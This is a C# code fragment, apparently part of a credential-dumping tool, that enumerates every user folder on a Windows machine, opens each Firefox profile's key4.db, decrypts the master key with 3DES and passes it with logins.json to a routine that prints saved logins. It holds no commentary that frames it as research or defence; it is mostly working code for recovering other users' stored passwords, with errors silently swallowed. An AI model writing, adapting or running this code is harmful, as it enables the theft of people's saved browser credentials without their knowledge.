public static Dictionary <string, string> decodeLoginData(byte[] data)
{
var kvpList = new Dictionary <string, string>();
var base64Decoded = Convert.FromBase64String(Encoding.UTF8.GetString(data));
var asn = new Cryptography.Asn1Der();
var parsedData = asn.Parse(base64Decoded);
//Console.WriteLine(parsedData);
/*
* SEQUENCE {
* SEQUENCE {
* OCTETSTRING F8000000000000000000000000000001
* OBJECTIDENTIFIER 2A864886F70D0307
* OCTETSTRING 34E18A54D558AB3E <------- iv
* OCTETSTRING D59EC72A4DDB13C2972846426DF2D46F <------- ciphertext
* OCTETSTRING D59EC72A4DDB13C2972846426DF2D46F
* }
* }
*
*/
var tokens = parsedData.ToString().Split(new[] { "OCTETSTRING" }, StringSplitOptions.None);
var saltString = tokens[2].Split('\r').Select(p => p.Trim()).ToList();
var cipherString = tokens[3].Split('\r').Select(p => p.Trim()).ToList();
kvpList.Add(saltString[0], cipherString[0]);
return(kvpList);
}
public static void DumpCreds()
{
var dirPath = "C:\\Users";
string loginjson;
byte[] key = null;
var dirs = new List <string>(Directory.EnumerateDirectories(dirPath));
try
{
foreach (var dir in dirs)
{
var Path = dir + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";
if (!Directory.Exists(Path))
{
continue;
}
var ProfilePath = Directory.GetDirectories(Path, "*.default");
var KeyPath = ProfilePath[0] + "\\key4.db";
loginjson = ProfilePath[0] + "\\logins.json";
var m_dbConnection = new SQLiteConnection("Data Source=" + KeyPath + ";Version=3;");
m_dbConnection.Open();
string sql = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
byte[] global_salt = null;
byte[] item2 = null;
using (var cmd = new SQLiteCommand(sql, m_dbConnection))
{
using (var rdr = cmd.ExecuteReader())
{
while (rdr.Read())
{
global_salt = (byte[])rdr.GetValue(0);
item2 = (byte[])rdr.GetValue(1);
}
}
}
var asn = new Cryptography.Asn1Der();
var parsedData = asn.Parse(item2);
//Console.WriteLine(parsedData);
//Asn1.AsnElt asn_AS_REP = Asn1.AsnElt.Decode(item2, false);
byte[] entry_salt_byte = new byte[20];
byte[] cipher_text_byte = new byte[16];
byte[] cipher_text_byte_new = new byte[32];
// This is very bad hack! If you want to do it properly, read from the parsed ASN1 data!!
Array.Copy(item2, 21, entry_salt_byte, 0, 20);
Array.Copy(item2, 46, cipher_text_byte, 0, 16);
//Console.WriteLine(ByteArrayToString(entry_salt_byte));
//Console.WriteLine(ByteArrayToString(cipher_text_byte));
var clearText = decrypt3DES(global_salt, entry_salt_byte, cipher_text_byte);
var clearString = Encoding.ASCII.GetString(clearText);
//Console.WriteLine(ByteArrayToString(clearText));
//Console.WriteLine();
byte[] a11 = null;
byte[] a102 = null;
if (clearString == "password-check\u0002\u0002")
{
var query = "SELECT a11,a102 FROM nssPrivate;";
using (var cmd = new SQLiteCommand(query, m_dbConnection))
{
using (var rdr = cmd.ExecuteReader())
{
while (rdr.Read())
{
a11 = (byte[])rdr.GetValue(0);
a102 = (byte[])rdr.GetValue(1);
}
}
}
Array.Copy(a11, 21, entry_salt_byte, 0, 20);
Array.Copy(a11, 46, cipher_text_byte_new, 0, 32);
//Console.WriteLine(ByteArrayToString(entry_salt_byte));
//Console.WriteLine(ByteArrayToString(cipher_text_byte_new));
var keyBytes = decrypt3DES(global_salt, entry_salt_byte, cipher_text_byte_new);
//Console.WriteLine("Key: " + ByteArrayToString(keyBytes));
//var keyBytes = StringToByteArray(ConvertStringToHex(mainKey));
key = new byte[24];
Array.Copy(keyBytes, key, 24);
}
m_dbConnection.Close();
printCreds(key, loginjson);
}
}
catch
{
}
}
